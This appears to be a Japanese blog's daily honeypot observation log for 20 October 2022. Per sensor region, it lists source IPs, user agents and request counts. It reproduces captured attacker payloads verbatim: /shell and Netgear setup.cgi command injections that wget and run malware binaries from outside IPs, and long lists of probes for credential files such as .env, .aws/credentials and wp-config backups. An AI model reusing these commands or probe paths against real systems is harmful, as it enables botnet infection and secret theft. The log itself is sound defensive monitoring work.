2022/10/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2022/10/20分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
KrebsOnSecurityによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
KrebsOnSecurityによるスキャン行為
masscan-ngによるスキャン行為
webprosbotによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm 6o1;
wget http:/\\/179.43.175.5/6o1;
chmod 777 6o1;
./6o1;
sh 6o1

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
KrebsOnSecurityによるスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 81.161.229.46/jaws;
sh /tmp/jaws

cd /tmp;
rm 6o1;
wget http:/\\/179.43.175.5/6o1;
chmod 777 6o1;
./6o1;
sh 6o1

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
WordPressへのスキャン行為
45.85.219.125に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
node-fetchによるスキャン行為
212.47.250.14に関する不正通信

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm 6o1;
wget http:/\\/179.43.175.5/6o1;
chmod 777 6o1;
./6o1;
sh 6o1

他

アクセス数推移

JP：総アクセス数：207 (前日比：104)
US：総アクセス数：110 (前日比：-204)
UK：総アクセス数：249 (前日比：-151)
SG：総アクセス数：72 (前日比：-228)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.98.143.69	United States
1	3.252.252.159	United States
17	4.231.40.214	United States
1	13.58.207.193	United States
1	13.59.39.157	United States
1	13.114.203.210	United States
1	13.209.85.95	United States
1	13.231.44.125	United States
1	13.251.106.0	United States
1	15.222.35.164	United States
1	15.228.58.8	United States
1	18.132.243.78	United States
1	18.230.64.27	United States
1	18.231.132.16	United States
1	20.224.152.197	United States
1	27.47.3.105	China
6	34.125.26.204	United States
1	43.200.7.229	United States
1	43.201.108.61	United States
1	43.206.131.63	United States
16	44.192.15.238	United States
1	44.197.235.5	United States
1	44.211.32.68	United States
3	45.61.185.198	United States
1	45.95.147.2	Netherlands
1	45.139.105.208	Bulgaria
87	52.66.226.54	United States
1	52.77.220.57	United States
1	54.153.88.96	United States
1	59.89.210.235	India
1	85.209.134.4	Bulgaria
6	95.214.235.205	Ukraine
1	99.79.194.10	United States
1	117.204.142.234	India
16	135.125.246.189	France
3	147.182.150.93	United States
4	159.223.34.97	United States
1	161.35.213.88	United States
3	165.22.239.242	United States
1	172.105.89.161	United States
1	184.105.139.73	United States
4	185.254.196.115	Ukraine
4	192.81.213.17	United States
1	192.241.217.42	United States
1	192.241.219.168	United States
1	192.241.221.77	United States
1	193.142.146.35	Germany
1	195.54.175.193	United Kingdom
1	198.235.24.27	United States
1	205.210.31.36	United States

UserAgent一覧

件数	UserAgent
44	`-`
1	`KrebsOnSecurity`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
87	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:104.0) Gecko/20100101 Firefox/104.0`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
16	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0`
3	`Mozilla/5.0 zgrab/0.x`
20	`curl/7.61.1`
1	`masscan-ng/1.3 (https[:]//github[.]com/bi-zone/masscan-ng)`
1	`webprosbot/2.0 (+mailto:abuse-6337@webpros.com)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`\x16\x03\x01\x01\xc0\x01`
14		`\x16\x03\x01`
1		`\x87]\xf0\xf3Y}\xbf\xed`	2\xde\xbe.M\xa7o\xec!^\xf0\xcc\x05\x1c\xf0v\x89\xdd[\xc0\x05\x1c\xf0\xcd\x01^\xf0\xcc\x05\x1f\xf8\xcc\x05\x1c\xf0\xcc\x05\x1c\xf0f\x05\x1c\xf0\xcc\x057\xdb\xcc\x05\x1c\xf0\xe4\x05\x1c\xf0\xcc\x05\x1c\xf0\xcc\x05\x1c\xf0\xcc\x05\x1c\xf0\xcd\x04\x1c\xf0\xcc\x05\n
1		`\x96n\x96wd\x9cH+z\x8c\x82U\x14\"\xec\xe2:\n`
1	GET	`/%20-%20.env`	HTTP/1.1
1	GET	`/%20-%20Copy.env`	HTTP/1.1
1	GET	`/%21.env`	HTTP/1.1
1	GET	`/-%20Copy.env`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config/gatsby/config.json`	HTTP/1.1
1	GET	`/.cordova/config.json`	HTTP/1.1
1	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/config.json`	HTTP/1.1
1	GET	`/.docker/daemon.json`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
2	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.docker.dev`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.php`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.sample.php`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.test.localapi/.env`	HTTP/1.1
1	GET	`/.env.test`	HTTP/1.1
51	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
1	GET	`/.envrc`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.env~`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
1	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
1	GET	`/.lanproxy/config.json`	HTTP/1.1
1	GET	`/.msmtprc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
2	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config.yml`	HTTP/1.1
2	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/application/application.ini`	HTTP/1.1
1	GET	`/application/configs/application.ini`	HTTP/1.1
1	GET	`/asdf.php`	HTTP/1.1
1	GET	`/aws.yml`	HTTP/1.1
1	GET	`/beta/.env`	HTTP/1.1
1	GET	`/blob/.env`	HTTP/1.1
1	GET	`/config.env`	HTTP/1.1
2	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/config/config.js`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
3	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/config/parameters.yml`	HTTP/1.1
1	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/base/config.json`	HTTP/1.1
1	GET	`/console/payments/config.json`	HTTP/1.1
1	GET	`/copy.env`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/database.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/env.backup`	HTTP/1.1
1	GET	`/env.config.js`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
2	GET	`/info.json`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/envConfig.js`	HTTP/1.1
1	GET	`/kyc/.env`	HTTP/1.1
3	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/maintenances`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/parameters.yml`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php-info`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
2	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/prod/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/secrets.yml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+6o1;wget+http:/\\/179.43.175.5/6o1;chmod+777+6o1;./6o1;sh+6o1`	HTTP/1.1
1	GET	`/temp.php`	HTTP/1.1
2	GET	`/test.php`	HTTP/1.1
1	GET	`/time.php`	HTTP/1.1
1	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/vendor/laravel/.env`	HTTP/1.1
1	GET	`/wp-config.php-backup`	HTTP/1.1
1	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`/wp-config.php.old`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//api[.]stepn[.]com/run/basicinfo`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/boaform/admin/formLogin`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.108.54.218	United States
1	3.226.249.193	United States
1	3.238.173.18	United States
1	13.48.45.246	United States
1	13.127.72.251	United States
1	15.188.84.30	United States
1	18.144.89.13	United States
1	18.185.79.19	United States
1	18.231.151.209	United States
1	35.182.225.227	United States
1	43.201.78.12	United States
1	43.206.107.224	United States
6	45.61.185.198	United States
1	45.95.147.2	Netherlands
2	45.227.254.54	Belize
2	45.227.254.55	Belize
17	51.79.29.48	Canada
1	51.159.164.227	France
1	52.53.184.105	United States
4	54.37.79.75	France
1	54.94.70.147	United States
1	60.217.75.70	China
1	64.62.197.209	United States
2	93.177.103.215	Turkey
1	103.154.5.62	India
1	113.118.250.147	China
14	121.46.25.189	China
1	134.195.157.44	United States
3	138.197.101.36	United States
3	138.197.155.232	United States
4	143.110.183.148	United States
2	152.89.196.211	Russia
1	156.146.57.190	United Kingdom
4	157.245.196.1	United States
4	159.65.16.7	United States
2	162.142.125.222	United States
2	167.71.67.167	United States
2	167.94.145.60	United States
2	167.248.133.61	United States
4	178.128.224.153	United States
3	183.136.225.35	China
1	192.241.212.70	United States
1	192.241.212.71	United States
1	192.241.218.211	United States
1	193.142.146.35	Germany
1	198.235.24.13	United States
1	198.235.24.28	United States

UserAgent一覧

件数	UserAgent
41	`-`
1	`2.0.1) Gecko/20100101 Firefox/4.0.1\"`
1	`Hello, World`
1	`Hello, world`
1	`KrebsOnSecurity`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
6	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
1	`\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv`
3	`\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML`
1	`\"Mozilla/5.0 (Windows NT 6.1; rv`
13	`curl/7.61.1`
2	`like Gecko) Chrome/17.0.963.56 Safari/535.11\"`
1	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`I\x0cZ\xb1\r\xc5\xda\xc9l7\x11\xaeK\x1f%;\x81@\x15\x02\xa1dW\x02\x1b\xe8\x96\xa9\xaddW\x02\xa0`\x15\x02\xa1dT\n`
4		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\xc0\x01`
28		`\x16\x03\x01`
1		`\x85z\xa8\xf6\x16\xc71\xb36L\xfa\n`
1		`\x99cY\n`
1		`m\xdf\xe6\xfd)\xd3\x0f%Fn\x9b\xe4}\x19+\xb1\x8cx\x9a\n`
37	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi?requestname=2&cmd=0`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi?requestname=3&cmd=0`	HTTP/1.1
6	GET	`/config/getuser?index=0`	HTTP/1.1
12	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/por/login_psw.csp`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+81[.]161[.]229[.]46/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+6o1;wget+http:/\\/179.43.175.5/6o1;chmod+777+6o1;./6o1;sh+6o1`	HTTP/1.1
1	GET	`/ui/login.php`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.27.69.177	United States
1	3.34.131.40	United States
1	3.36.13.145	United States
87	3.110.63.182	United States
1	3.110.196.175	United States
1	3.238.173.18	United States
1	13.213.1.100	United States
1	13.250.43.175	United States
1	15.222.33.85	United States
1	15.229.29.115	United States
1	18.143.163.15	United States
1	18.182.37.208	United States
1	18.230.148.22	United States
1	34.219.239.178	United States
1	35.72.14.149	United States
1	35.78.189.30	United States
1	35.158.137.163	United States
1	35.183.25.9	United States
1	42.231.88.40	China
1	43.205.231.34	United States
2	45.61.185.198	United States
1	45.95.147.2	Netherlands
2	45.227.254.49	Belize
1	52.88.207.171	United States
1	59.93.21.136	India
1	64.62.197.168	United States
1	94.232.47.51	Russia
1	96.11.216.106	United States
1	117.194.156.59	India
4	137.184.168.234	United States
4	138.68.163.118	United States
2	152.89.196.211	Russia
1	159.65.165.178	United States
4	159.223.226.248	United States
2	162.142.125.211	United States
4	164.92.249.237	United States
2	167.99.42.93	United States
1	172.104.242.173	United States
1	175.100.20.204	Cambodia
1	183.136.225.35	China
4	185.142.236.35	Seychelles
1	192.241.203.142	United States
1	192.241.204.244	United States
1	192.241.213.99	United States
1	192.241.213.125	United States
1	193.142.146.35	Germany
1	198.235.24.18	United States
1	198.235.24.142	United States
1	205.210.31.18	United States
94	212.2.236.244	Sweden

UserAgent一覧

件数	UserAgent
127	`-`
1	`Hello, World`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0`
87	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
1	`Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
18	`curl/7.61.1`
1	`python-requests/2.28.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
3		`\x03`
1		`\x16\x03\x01\x01\xc0\x01`
17		`\x16\x03\x01`
1		`\xb3\xf5,~.\xe7Cy$\xbd\n`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
1		`\xc4\xa9\|`{\t,^!-\x1ebb\x02\xe5\x84\x02\xe5:g\"\xc1xg\x98M\xb9\xcc.\xc1xg#\xc5:g\"\xc1{o\"\xc1xg\"\xc1xg\x88\xc1xg\"\xc1SL\"\xc1xg\n`
1		`\xfd\x0f\xa3\xa16\n`
1		`{\xdb\x95\x9cQ.\n`
94	CONNECT	`45[.]85[.]219[.]125:4444`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.config/gatsby/config.json`	HTTP/1.1
1	GET	`/.cordova/config.json`	HTTP/1.1
1	GET	`/.deployment-config.json`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/config.json`	HTTP/1.1
1	GET	`/.docker/daemon.json`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.development.local`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.docker.dev`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.php`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production.local`	HTTP/1.1
1	GET	`/.env.sample.php`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.test.localapi/.env`	HTTP/1.1
1	GET	`/.env.test`	HTTP/1.1
21	GET	`/.env`	HTTP/1.1
1	GET	`/.environment`	HTTP/1.1
1	GET	`/.envrc`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.env~`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
1	GET	`/.jupyter/jupyter_notebook_config.json`	HTTP/1.1
1	GET	`/.lanproxy/config.json`	HTTP/1.1
1	GET	`/.msmtprc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/_wpeprivate/config.json`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/app/config.yml`	HTTP/1.1
1	GET	`/app/config/parameters.yml`	HTTP/1.1
1	GET	`/asdf.php`	HTTP/1.1
1	GET	`/beta/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/config.env`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/config.js`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
2	GET	`/config/getuser?index=0`	HTTP/1.1
1	GET	`/config/secrets.yml`	HTTP/1.1
1	GET	`/console/base/config.json`	HTTP/1.1
1	GET	`/console/payments/config.json`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/database.yml`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/env.backup`	HTTP/1.1
1	GET	`/env.config.js`	HTTP/1.1
1	GET	`/env.js`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
1	GET	`/js/config.js`	HTTP/1.1
1	GET	`/js/envConfig.js`	HTTP/1.1
1	GET	`/kyc/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/secrets.yml`	HTTP/1.1
1	GET	`/server/config.json`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/time.php`	HTTP/1.1
1	GET	`/twitter/.env`	HTTP/1.1
1	GET	`/wp-config.php-backup`	HTTP/1.1
1	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`/wp-config.php.old`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.75.249.73	United States
1	3.110.31.113	United States
1	13.37.107.113	United States
1	13.114.58.134	United States
1	13.233.35.226	United States
1	18.169.243.89	United States
1	18.231.158.15	United States
1	23.90.160.114	United States
2	23.148.145.231	United States
1	23.251.102.82	United States
1	27.40.88.117	China
1	35.178.167.126	United States
1	45.61.185.198	United States
2	45.95.55.43	Germany
1	45.95.147.2	Netherlands
1	49.143.32.6	South Korea
4	51.79.29.48	Canada
15	54.37.79.75	France
1	54.67.21.87	United States
1	54.153.41.121	United States
1	54.154.175.247	United States
1	54.162.99.86	United States
1	54.199.203.128	United States
1	54.200.188.97	United States
1	69.71.5.2	United States
1	74.82.47.45	United States
1	128.14.209.170	United States
1	149.5.172.166	United States
2	152.89.196.211	Russia
4	159.223.20.85	United States
2	162.142.125.8	United States
3	165.232.187.235	United States
1	172.105.89.161	United States
1	178.141.47.1	Russia
1	179.43.187.234	Panama
1	185.83.144.103	Turkey
1	185.225.73.254	Bulgaria
2	188.166.48.184	United States
1	192.241.216.80	United States
1	192.241.221.72	United States
1	193.142.146.35	Germany
2	194.165.16.10	Panama
1	205.210.31.33	United States
1	223.152.219.82	China

UserAgent一覧

件数	UserAgent
21	`-`
1	`KrebsOnSecurity`
1	`Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
14	`curl/7.61.1`
1	`node-fetch/1.0 (+https[:]//github[.]com/bitinn/node-fetch)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`R\xb2GO3y\x16\x1bZ\x9b\t\|N3\b)+#\xa8a\v\x07\xeaa\xb1\x8b+\xca\x07\x07\xeaa`
2		`\x03`
1		`\x16\x03\x01\x01\xc0\x01`
9		`\x16\x03\x01`
1	CONNECT	`212[.]47[.]250[.]14:443`	HTTP/1.1
1	CONNECT	`proxy[.]korsangazi[.]com:443`	HTTP/1.1
34	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`//.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/agc/timeclock.php`	HTTP/1.1
1	GET	`/agent/timeclock.php`	HTTP/1.1
